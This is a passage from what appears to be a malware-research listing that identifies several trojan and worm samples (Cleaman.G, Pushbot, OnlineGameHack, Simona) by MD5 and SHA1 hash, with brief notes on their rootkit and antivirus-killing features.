MD5: 612700f68e7e9c62c3c754cdeff6caa5

MD5: 31cf2ccf68f7a1619557b4419df695a7
SHA1:  f88a9ddf11fa6a897c555ce9116dba931fde22c5

4. Cleaman.G trojan with features of hosts-file modifications and ring-3 "rootkit".

SHA1: 8d502546c344a16c66ff4ee82dda3004343d3ff9
MD5: 1cb27d4ecd25c2030ebb6a1a9b7e3321

5. Pushbot worm via facebook spreading with ring3 "rootkit" feature.

SHA1: 8284814c5c5cb0f37fe200b918b65ef89c259a0a
MD5: 3e50b76c0066c314d224f4fd4cbf14d5

6. Trojan/Win32.OnlineGameHack - Korean games-cheater and AV-killer, targeted to AhnLab-V3 AV killing.

SHA1: 53b1ce48f2b0cf3c7028184676be7b21485bd45a
MD5: ab551ebc28e4cbcdcb44b1175e14038b

7. Simona trojan - Korean multi-AV killer, targeted to Kaspersky, Avast and others with rootkit (FSD-drivers hooking).

SHA1: 9d810d82ed897d32c3874cb093ad82b79a176303
MD5: 3083f4301416130f0e42ace95261645c
Viewing all 58 articles
Browse latest View live
Search